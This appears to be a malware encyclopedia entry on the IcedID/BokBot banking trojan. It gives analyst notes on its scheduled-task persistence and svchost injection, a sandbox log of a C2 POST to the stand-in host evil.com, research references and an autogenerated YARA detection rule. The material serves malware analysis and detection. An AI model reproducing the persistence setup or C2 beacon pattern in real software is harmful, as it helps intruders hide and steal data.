SYMBOLCOMMON_NAMEaka. SYNONYMS
win.icedid (Back to overview)

IcedID

aka: BokBot, IceID

Actor(s): Lunar Spider

URLhaus        

Analysis Observations:

* It sets up persistence by creating a Scheduled Task with the following characteristics:
* Name: Update
* Trigger: At Log on
* Action: %LocalAppData%\$Example\\waroupada.exe /i
* Conditions: Stop if the computer ceases to be idle.
* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.
* The filename remained static during analysis.
* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it
* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.
* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.
* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:
rundll32.exe kernel32,Sleep -s
* Setup a local listener to proxy traffic on 127.0.0.1:50000

**[Example Log from C2 Network Communication]**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2

References
2020-08-10tccontre Blogtccontre
@online{tccontre:20200810:learning:8cc052c, author = {tccontre}, title = {{Learning From ICEID loader - Including its Steganography Payload Parsing}}, date = {2020-08-10}, organization = {tccontre Blog}, url = {https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html}, language = {English}, urldate = {2020-08-14} } Learning From ICEID loader - Including its Steganography Payload Parsing
IcedID
2020-07-30SpamhausSpamhaus Malware Labs
@techreport{labs:20200730:spamhaus:038546d, author = {Spamhaus Malware Labs}, title = {{Spamhaus Botnet Threat Update Q2 2020}}, date = {2020-07-30}, institution = {Spamhaus}, url = {https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf}, language = {English}, urldate = {2020-07-30} } Spamhaus Botnet Threat Update Q2 2020
AdWind Agent Tesla Arkei Stealer AsyncRAT Ave Maria Azorult DanaBot Emotet IcedID ISFB KPOT Stealer Loki Password Stealer (PWS) Nanocore RAT NetWire RC NjRAT Pony Raccoon RedLine Stealer Remcos Zloader
2020-06-22zero2autoDaniel Bunce
@online{bunce:20200622:unpacking:8a02d84, author = {Daniel Bunce}, title = {{Unpacking Visual Basic Packers – IcedID}}, date = {2020-06-22}, organization = {zero2auto}, url = {https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/}, language = {English}, urldate = {2020-06-24} } Unpacking Visual Basic Packers – IcedID
IcedID
2020-06-18JuniperPaul Kimayong
@online{kimayong:20200618:covid19:4bb5511, author = {Paul Kimayong}, title = {{COVID-19 and FMLA Campaigns used to install new IcedID banking malware}}, date = {2020-06-18}, organization = {Juniper}, url = {https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware}, language = {English}, urldate = {2020-06-23} } COVID-19 and FMLA Campaigns used to install new IcedID banking malware
IcedID
2020-06-17Github (f0wl)Marius Genheimer
@online{genheimer:20200617:deicer:de78cca, author = {Marius Genheimer}, title = {{deICEr: A Go tool for extracting config from IcedID second stage Loaders}}, date = {2020-06-17}, organization = {Github (f0wl)}, url = {https://github.com/f0wl/deICEr}, language = {English}, urldate = {2020-06-18} } deICEr: A Go tool for extracting config from IcedID second stage Loaders
IcedID
2020-05-29Group-IBIvan Pisarev
@online{pisarev:20200529:icedid:9627fda, author = {Ivan Pisarev}, title = {{IcedID: When ice burns through bank accounts}}, date = {2020-05-29}, organization = {Group-IB}, url = {https://www.group-ib.com/blog/icedid}, language = {English}, urldate = {2020-06-02} } IcedID: When ice burns through bank accounts
IcedID
2020-03-04CrowdStrikeCrowdStrike
@techreport{crowdstrike:20200304:2020:818c85f, author = {CrowdStrike}, title = {{2020 CrowdStrike Global Threat Report}}, date = {2020-03-04}, institution = {CrowdStrike}, url = {https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf}, language = {English}, urldate = {2020-07-24} } 2020 CrowdStrike Global Threat Report
MESSAGETAP More_eggs 8.t Dropper Anchor BabyShark BadNews Clop Cobalt Strike CobInt Cobra Carbon System Cutwail DanaBot Dharma DoppelPaymer Dridex Emotet FlawedAmmyy FriedEx Gandcrab Get2 IcedID ISFB KerrDown LightNeuron LockerGoga Maze MECHANICAL Necurs Nokki Outlook Backdoor Phobos Ransomware Predator The Thief QakBot REvil RobinHood Ryuk SDBbot Skipper SmokeLoader TerraRecon TerraStealer TerraTV TinyLoader TrickBot vidar Winnti ANTHROPOID SPIDER Anunak APT31 APT39 BlackTech BuhTrap Charming Kitten CLOCKWORD SPIDER DOPPEL SPIDER Gamaredon Group Leviathan MONTY SPIDER Mustang Panda NARWHAL SPIDER NOCTURNAL SPIDER Pinchy Spider Pirate Panda Salty Spider SCULLY SPIDER SMOKY SPIDER Thrip VENOM SPIDER
2020-02-18Sophos LabsLuca Nagy
@online{nagy:20200218:nearly:8ff363f, author = {Luca Nagy}, title = {{Nearly a quarter of malware now communicates using TLS}}, date = {2020-02-18}, organization = {Sophos Labs}, url = {https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/}, language = {English}, urldate = {2020-02-27} } Nearly a quarter of malware now communicates using TLS
Dridex IcedID TrickBot
2020SecureworksSecureWorks
@online{secureworks:2020:gold:65fcc96, author = {SecureWorks}, title = {{GOLD SWATHMORE}}, date = {2020}, organization = {Secureworks}, url = {https://www.secureworks.com/research/threat-profiles/gold-swathmore}, language = {English}, urldate = {2020-05-23} } GOLD SWATHMORE
GlobeImposter Gozi IcedID TrickBot Lunar Spider
2019-12-18Github (psrok1)Paweł Srokosz
@online{srokosz:20191218:icedid:05c3255, author = {Paweł Srokosz}, title = {{IcedID PNG Extractor}}, date = {2019-12-18}, organization = {Github (psrok1)}, url = {https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b}, language = {English}, urldate = {2020-01-13} } IcedID PNG Extractor
IcedID
2019-12-12FireEyeChi-en Shen, Oleg Bondarenko
@online{shen:20191212:cyber:e01baca, author = {Chi-en Shen and Oleg Bondarenko}, title = {{Cyber Threat Landscape in Japan – Revealing Threat in the Shadow}}, date = {2019-12-12}, organization = {FireEye}, url = {https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko}, language = {English}, urldate = {2020-04-16} } Cyber Threat Landscape in Japan – Revealing Threat in the Shadow
Cerberus TSCookie Cobalt Strike Dtrack Emotet Formbook IcedID Icefog IRONHALO Loki Password Stealer (PWS) PandaBanker PLEAD poisonplug TrickBot BlackTech
2019-12-03MalwarebytesThreat Intelligence Team
@online{team:20191203:new:39b59e1, author = {Threat Intelligence Team}, title = {{New version of IcedID Trojan uses steganographic payloads}}, date = {2019-12-03}, organization = {Malwarebytes}, url = {https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/}, language = {English}, urldate = {2019-12-24} } New version of IcedID Trojan uses steganographic payloads
IcedID
2019-07-09FortinetKai Lu
@online{lu:20190709:deep:90d708f, author = {Kai Lu}, title = {{A Deep Dive Into IcedID Malware: Part I - Unpacking, Hooking and Process Injection}}, date = {2019-07-09}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html}, language = {English}, urldate = {2020-01-08} } A Deep Dive Into IcedID Malware: Part I - Unpacking, Hooking and Process Injection
IcedID
2019-06-25Dawid Golak
@online{golak:20190625:icedid:0a3e153, author = {Dawid Golak}, title = {{IcedID aka #Bokbot Analysis with Ghidra}}, date = {2019-06-25}, url = {https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766}, language = {English}, urldate = {2019-12-02} } IcedID aka #Bokbot Analysis with Ghidra
IcedID
2019-06-16FortinetKai Lu
@online{lu:20190616:deep:ba89738, author = {Kai Lu}, title = {{A Deep Dive Into IcedID Malware: Part II - Analysis of the Core IcedID Payload (Parent Process)}}, date = {2019-06-16}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html}, language = {English}, urldate = {2019-11-27} } A Deep Dive Into IcedID Malware: Part II - Analysis of the Core IcedID Payload (Parent Process)
IcedID
2019-04-04SecurityIntelligenceNir Somech, Limor Kessem
@online{somech:20190404:icedid:54ba40f, author = {Nir Somech and Limor Kessem}, title = {{IcedID Banking Trojan Spruces Up Injection Tactics to Add Stealth}}, date = {2019-04-04}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/}, language = {English}, urldate = {2020-01-08} } IcedID Banking Trojan Spruces Up Injection Tactics to Add Stealth
IcedID
2019-03-21CrowdStrikeShaun Hurley, James Scalise
@online{hurley:20190321:interception:7e57329, author = {Shaun Hurley and James Scalise}, title = {{Interception: Dissecting BokBot’s “Man in the Browser”}}, date = {2019-03-21}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/}, language = {English}, urldate = {2019-12-20} } Interception: Dissecting BokBot’s “Man in the Browser”
IcedID
2019-02-15CrowdStrikeBrendon Feeley, Bex Hartley
@online{feeley:20190215:sinful:729f693, author = {Brendon Feeley and Bex Hartley}, title = {{“Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web}}, date = {2019-02-15}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/}, language = {English}, urldate = {2019-12-20} } “Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web
Dyre IcedID TrickBot Vawtrak Lunar Spider WIZARD SPIDER
2019-02-06SecurityIntelligenceItzik Chimino, Limor Kessem, Ophir Harpaz
@online{chimino:20190206:icedid:ef0caad, author = {Itzik Chimino and Limor Kessem and Ophir Harpaz}, title = {{IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites}}, date = {2019-02-06}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/}, language = {English}, urldate = {2020-01-08} } IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites
IcedID
2019-01-03CrowdStrikeShaun Hurley, James Scalise
@online{hurley:20190103:digging:5219f6d, author = {Shaun Hurley and James Scalise}, title = {{Digging into BokBot’s Core Module}}, date = {2019-01-03}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/}, language = {English}, urldate = {2019-12-20} } Digging into BokBot’s Core Module
IcedID
2018-11-09Youtube (OALabs)Sean Wilson, Sergei Frankoff
@online{wilson:20181109:reverse:7e90205, author = {Sean Wilson and Sergei Frankoff}, title = {{Reverse Engineering IcedID / Bokbot Malware Part 2}}, date = {2018-11-09}, organization = {Youtube (OALabs)}, url = {https://www.youtube.com/watch?v=7Dk7NkIbVqY}, language = {English}, urldate = {2019-07-09} } Reverse Engineering IcedID / Bokbot Malware Part 2
IcedID
2018-10-26Youtube (OALabs)Sergei Frankoff
@online{frankoff:20181026:unpacking:b6155cc, author = {Sergei Frankoff}, title = {{Unpacking Bokbot / IcedID Malware - Part 1}}, date = {2018-10-26}, organization = {Youtube (OALabs)}, url = {https://www.youtube.com/watch?v=wObF9n2UIAM}, language = {English}, urldate = {2020-01-08} } Unpacking Bokbot / IcedID Malware - Part 1
IcedID
2018-09-07Vitali Kremez
@online{kremez:20180907:lets:8515a2b, author = {Vitali Kremez}, title = {{Let's Learn: Deeper Dive into "IcedID"/"BokBot" Banking Malware: Part 1}}, date = {2018-09-07}, url = {https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html}, language = {English}, urldate = {2020-01-08} } Let's Learn: Deeper Dive into "IcedID"/"BokBot" Banking Malware: Part 1
IcedID
2018-08-09Fox-ITAlfred Klason
@online{klason:20180809:bokbot:499f316, author = {Alfred Klason}, title = {{Bokbot: The (re)birth of a banker}}, date = {2018-08-09}, organization = {Fox-IT}, url = {https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/}, language = {English}, urldate = {2019-12-20} } Bokbot: The (re)birth of a banker
IcedID Vawtrak
2018-04-10Cisco TalosRoss Gibb, Daphne Galme, Michael Gorelik
@online{gibb:20180410:icedid:f1a3ff2, author = {Ross Gibb and Daphne Galme and Michael Gorelik}, title = {{IcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution}}, date = {2018-04-10}, organization = {Cisco Talos}, url = {https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html}, language = {English}, urldate = {2019-12-17} } IcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution
IcedID
2017-11-14Digital GuardianChris Brook
@online{brook:20171114:iceid:5a074d2, author = {Chris Brook}, title = {{IceID Banking Trojan Targeting Banks, Payment Card Providers, E-Commerce Sites}}, date = {2017-11-14}, organization = {Digital Guardian}, url = {https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites}, language = {English}, urldate = {2019-07-10} } IceID Banking Trojan Targeting Banks, Payment Card Providers, E-Commerce Sites
IcedID
2017-11-13SecurityIntelligenceLimor Kessem, Maor Wiesen, Tal Darsan, Tomer Agayev
@online{kessem:20171113:new:bb937fd, author = {Limor Kessem and Maor Wiesen and Tal Darsan and Tomer Agayev}, title = {{New Banking Trojan IcedID Discovered by IBM X-Force Research}}, date = {2017-11-13}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/}, language = {English}, urldate = {2019-11-27} } New Banking Trojan IcedID Discovered by IBM X-Force Research
IcedID IcedID Downloader
2017-11-13IntezerJay Rosenberg
@online{rosenberg:20171113:icedid:8dd9da4, author = {Jay Rosenberg}, title = {{IcedID Banking Trojan Shares Code with Pony 2.0 Trojan}}, date = {2017-11-13}, organization = {Intezer}, url = {http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/}, language = {English}, urldate = {2019-12-02} } IcedID Banking Trojan Shares Code with Pony 2.0 Trojan
IcedID IcedID Downloader
Yara Rules
[TLP:WHITE] win_icedid_auto (20200529 | autogenerated rule brought to you by yara-signator)
rule win_icedid_auto {

    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2020-05-30"
        version = "1"
        description = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.4.0"
        tool_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid"
        malpedia_rule_date = "20200529"
        malpedia_hash = "92c362319514e5a6da26204961446caa3a8b32a8"
        malpedia_version = "20200529"
        malpedia_license = "CC BY-SA 4.0"
        malpedia_sharing = "TLP:WHITE"

    /* DISCLAIMER
     * The strings used in this rule have been automatically selected from the
     * disassembly of memory dumps and unpacked files, using yara-signator.
     * The code and documentation / approach is published here:
     * https://github.com/fxb-cocacoding/yara-signator
     * As Malpedia is used as data source, please note that for a given
     * number of families, only single samples are documented.
     * This likely impacts the degree of generalization these rules will offer.
     * Take the described generation method also into consideration when you
     * apply the rules in your use cases and assign them confidence levels.
     */


    strings:
        $sequence_0 = { ff15???????? eb0f 6a08 ff15???????? }
            // n = 4, score = 1300
            //   ff15????????         |                     
            //   eb0f                 | jmp                 0x11
            //   6a08                 | push                8
            //   ff15????????         |                     

        $sequence_1 = { 6a02 ff75fc ff15???????? 8bf0 }
            // n = 4, score = 1300
            //   6a02                 | push                2
            //   ff75fc               | push                dword ptr [ebp - 4]
            //   ff15????????         |                     
            //   8bf0                 | mov                 esi, eax

        $sequence_2 = { 85f6 742c 803e00 7427 6a3b 56 ff15???????? }
            // n = 7, score = 1300
            //   85f6                 | test                esi, esi
            //   742c                 | je                  0x2e
            //   803e00               | cmp                 byte ptr [esi], 0
            //   7427                 | je                  0x29
            //   6a3b                 | push                0x3b
            //   56                   | push                esi
            //   ff15????????         |                     

        $sequence_3 = { 68???????? 6a00 ff15???????? 33c0 40 }
            // n = 5, score = 1300
            //   68????????           |                     
            //   6a00                 | push                0
            //   ff15????????         |                     
            //   33c0                 | xor                 eax, eax
            //   40                   | inc                 eax

        $sequence_4 = { 7413 ff36 6a08 ff15???????? }
            // n = 4, score = 1300
            //   7413                 | je                  0x15
            //   ff36                 | push                dword ptr [esi]
            //   6a08                 | push                8
            //   ff15????????         |                     

        $sequence_5 = { 7411 ff7500 56 ff15???????? 50 ff15???????? }
            // n = 6, score = 1300
            //   7411                 | je                  0x13
            //   ff7500               | push                dword ptr [ebp]
            //   56                   | push                esi
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     

        $sequence_6 = { 8bf7 8bc6 eb02 33c0 5f }
            // n = 5, score = 1300
            //   8bf7                 | mov                 esi, edi
            //   8bc6                 | mov                 eax, esi
            //   eb02                 | jmp                 4
            //   33c0                 | xor                 eax, eax
            //   5f                   | pop                 edi

        $sequence_7 = { 6a08 ff15???????? 50 ff15???????? 8bf0 85f6 7502 }
            // n = 7, score = 1300
            //   6a08                 | push                8
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8bf0                 | mov                 esi, eax
            //   85f6                 | test                esi, esi
            //   7502                 | jne                 4

        $sequence_8 = { e8???????? 8bf0 8d45fc 50 ff75fc 6a05 }
            // n = 6, score = 1000
            //   e8????????           |                     
            //   8bf0                 | mov                 esi, eax
            //   8d45fc               | lea                 eax, [ebp - 4]
            //   50                   | push                eax
            //   ff75fc               | push                dword ptr [ebp - 4]
            //   6a05                 | push                5

        $sequence_9 = { 66c16c241c0c 0fb7d2 c744241000100000 663b542410 7215 81e2ff0f0000 }
            // n = 6, score = 800
            //   66c16c241c0c         | shr                 word ptr [esp + 0x1c], 0xc
            //   0fb7d2               | movzx               edx, dx
            //   c744241000100000     | mov                 dword ptr [esp + 0x10], 0x1000
            //   663b542410           | cmp                 dx, word ptr [esp + 0x10]
            //   7215                 | jb                  0x17
            //   81e2ff0f0000         | and                 edx, 0xfff

        $sequence_10 = { d1ed 6a00 5f 743f 8d5808 }
            // n = 5, score = 800
            //   d1ed                 | shr                 ebp, 1
            //   6a00                 | push                0
            //   5f                   | pop                 edi
            //   743f                 | je                  0x41
            //   8d5808               | lea                 ebx, [eax + 8]

        $sequence_11 = { eb5c 8d5004 89542414 8b12 }
            // n = 4, score = 800
            //   eb5c                 | jmp                 0x5e
            //   8d5004               | lea                 edx, [eax + 4]
            //   89542414             | mov                 dword ptr [esp + 0x14], edx
            //   8b12                 | mov                 edx, dword ptr [edx]

        $sequence_12 = { 8d4508 50 0fb6440b34 50 ff740b28 8b440b24 }
            // n = 6, score = 800
            //   8d4508               | lea                 eax, [ebp + 8]
            //   50                   | push                eax
            //   0fb6440b34           | movzx               eax, byte ptr [ebx + ecx + 0x34]
            //   50                   | push                eax
            //   ff740b28             | push                dword ptr [ebx + ecx + 0x28]
            //   8b440b24             | mov                 eax, dword ptr [ebx + ecx + 0x24]

        $sequence_13 = { 89542414 8b12 85d2 7454 }
            // n = 4, score = 800
            //   89542414             | mov                 dword ptr [esp + 0x14], edx
            //   8b12                 | mov                 edx, dword ptr [edx]
            //   85d2                 | test                edx, edx
            //   7454                 | je                  0x56

        $sequence_14 = { 47 83c302 3bfd 72c4 }
            // n = 4, score = 800
            //   47                   | inc                 edi
            //   83c302               | add                 ebx, 2
            //   3bfd                 | cmp                 edi, ebp
            //   72c4                 | jb                  0xffffffc6

        $sequence_15 = { ff7008 ff36 e8???????? 83c40c }
            // n = 4, score = 800
            //   ff7008               | push                dword ptr [eax + 8]
            //   ff36                 | push                dword ptr [esi]
            //   e8????????           |                     
            //   83c40c               | add                 esp, 0xc

        $sequence_16 = { a808 75f5 a804 7406 }
            // n = 4, score = 400
            //   a808                 | test                al, 8
            //   75f5                 | jne                 0xfffffff7
            //   a804                 | test                al, 4
            //   7406                 | je                  8

        $sequence_17 = { ff15???????? 85c0 750a b8010000c0 }
            // n = 4, score = 400
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   750a                 | jne                 0xc
            //   b8010000c0           | mov                 eax, 0xc0000001

        $sequence_18 = { ff5010 85c0 7407 33c0 }
            // n = 4, score = 400
            //   ff5010               | call                dword ptr [eax + 0x10]
            //   85c0                 | test                eax, eax
            //   7407                 | je                  9
            //   33c0                 | xor                 eax, eax

        $sequence_19 = { c1ca0d 0fbec0 03d0 48 ffc1 8a01 84c0 }
            // n = 7, score = 200
            //   c1ca0d               | ror                 edx, 0xd
            //   0fbec0               | movsx               eax, al
            //   03d0                 | add                 edx, eax
            //   48                   | dec                 eax
            //   ffc1                 | inc                 ecx
            //   8a01                 | mov                 al, byte ptr [ecx]
            //   84c0                 | test                al, al

        $sequence_20 = { 891d???????? 891d???????? 871d???????? 48 8b5c2430 }
            // n = 5, score = 200
            //   891d????????         |                     
            //   891d????????         |                     
            //   871d????????         |                     
            //   48                   | dec                 eax
            //   8b5c2430             | mov                 ebx, dword ptr [esp + 0x30]

        $sequence_21 = { 48 83ec20 41 83c9ff 45 33d2 44 }
            // n = 7, score = 200
            //   48                   | dec                 eax
            //   83ec20               | sub                 esp, 0x20
            //   41                   | inc                 ecx
            //   83c9ff               | or                  ecx, 0xffffffff
            //   45                   | inc                 ebp
            //   33d2                 | xor                 edx, edx
            //   44                   | inc                 esp

        $sequence_22 = { 0fb6c5 0f46d0 44 8af2 41 f6c040 }
            // n = 6, score = 200
            //   0fb6c5               | movzx               eax, ch
            //   0f46d0               | cmovbe              edx, eax
            //   44                   | inc                 esp
            //   8af2                 | mov                 dh, dl
            //   41                   | inc                 ecx
            //   f6c040               | test                al, 0x40

        $sequence_23 = { 33c0 4d 8bf0 48 8bf2 45 }
            // n = 6, score = 200
            //   33c0                 | xor                 eax, eax
            //   4d                   | dec                 ebp
            //   8bf0                 | mov                 esi, eax
            //   48                   | dec                 eax
            //   8bf2                 | mov                 esi, edx
            //   45                   | inc                 ebp

    condition:
        7 of them and filesize < 303104
}
Download all Yara Rules